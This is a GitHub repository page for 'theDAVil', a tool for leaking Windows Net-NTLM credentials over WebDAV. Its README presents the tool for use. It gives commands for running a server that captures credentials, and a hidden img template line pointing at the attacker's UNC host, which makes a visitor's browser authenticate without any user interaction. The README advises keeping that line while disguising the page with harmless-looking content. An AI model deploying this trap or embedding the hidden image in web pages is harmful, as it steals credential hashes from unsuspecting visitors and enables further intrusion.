Skip to content

audibleblink/davil

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
views
views
 
 
.ruby-version
.ruby-version
 
 
Dockerfile
Dockerfile
 
 
Gemfile
Gemfile
 
 
Gemfile.lock
Gemfile.lock
 
 
README.md
README.md
 
 
server.rb
server.rb
 
 
theDAVil.sh
theDAVil.sh
 
 

Repository files navigation

theDAVil

Host a website with an image at a UNC path and get creds. Bypasses Intranet Zones and forces auth over the Internet.

note: discovered later that this only work on virtualized hosts that use hypervisor-defined-networking that will resolve intergerized IP addresses via DNS, to a normal IP. Having such a hypervisor bypasses the Intranet Zones restriction of automatic authentication, bypassing any need for user interaction.

A normal looking web page

Behind the Scenes

Usage

With Docker

./theDAVil.sh 192.168.99.101 443`

With Just Ruby

# If you already have a ruby dev env
bundle
ruby server.rb 192.168.99.101 443


# Else
apt install rbenv ruby-build
rbenv install 3.0.0
eval $(rbenv init -)

bundle install
bundle exec ruby server.rb 192.168.99.101 443

Customization

Replace the views/index.erb with your content. Make sure you keep the template line that looks like this:

<img src="<%= "\\\\#{@host}@#{@port}\\logo.png" %>" style="display: none" />

About

leaking net-ntlm with webdav

Resources

Readme
Activity

Stars

24 stars

Watchers

4 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages